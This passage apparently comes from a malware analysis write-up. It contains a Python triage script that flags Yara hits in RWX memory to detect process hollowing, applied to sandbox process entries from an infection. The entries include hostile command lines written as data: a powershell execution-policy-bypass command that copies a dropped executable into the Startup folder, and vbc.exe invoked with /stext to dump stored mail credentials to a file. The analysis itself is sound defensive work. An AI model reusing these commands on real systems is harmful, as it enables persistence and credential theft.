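            findings.append("crash handler for PID %s: Yara hits here are usually the crashed "
                            "process's memory, not a WerFault infection" % m.group(1))

    for src in proc.yara_sources:
        d = parse_sdmp(src)
        if d["pid"] != proc.pid or d["prot"] != PAGE_EXECUTE_READWRITE:
            continue   # read-only image pages and RW heap are expected; RWX is not
        inside = proc.imagebase <= d["addr"] < proc.imagebase + IMAGE_WINDOW
        findings.append("Yara hit in RWX memory at 0x%X, %s the image base 0x%X"
                        % (d["addr"], "inside" if inside else "outside", proc.imagebase))
    return sorted(set(findings))


def triage_report(procs):
    """Map executable name -> findings for every process entry."""
    return {p.path.rsplit("\\", 1)[-1].lower(): triage(p) for p in procs}


# Constructed from the entries above (one of the two vbc.exe entries is included).
REPORT = [
    Proc(0, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 0x13C0000,
         "'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item "
         r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' "
         r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'"),
    Proc(0x1A, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", 0x770000,
         r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
         ["0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp",
          "0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp"]),
    Proc(0x1B, r"C:\Users\user\AppData\Local\Temp\hawkgoods.exe", 0xA40000,
         r"'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0",
         ["0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp",
          "0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp"]),
    Proc(0x22, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe", 0x400000,
         r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'",
         ["00000022.00000002.446713470.0000000000400000.00000040.00000001.sdmp"]),
    Proc(0x25, r"C:\Windows\SysWOW64\WerFault.exe", 0xB60000,
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940",
         ["00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp"]),
]

if __name__ == "__main__":
    for exe, found in triage_report(REPORT).items():
        print(exe, "->", found or ["no findings"])
```

Note that hawkgoods.exe produces no finding even though it has seventeen Yara hits: its hits are in read-only image pages (the dropped file itself) and in read-write heap (the unpacked payload a .NET loader holds in memory), both of which are normal for the dropper stage. The RWX test singles out the two places where a foreign PE was written into another process and executed, which is what the "Sample uses process hollowing technique" signature at the top of the report is built on.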

Disassembly

Code Analysis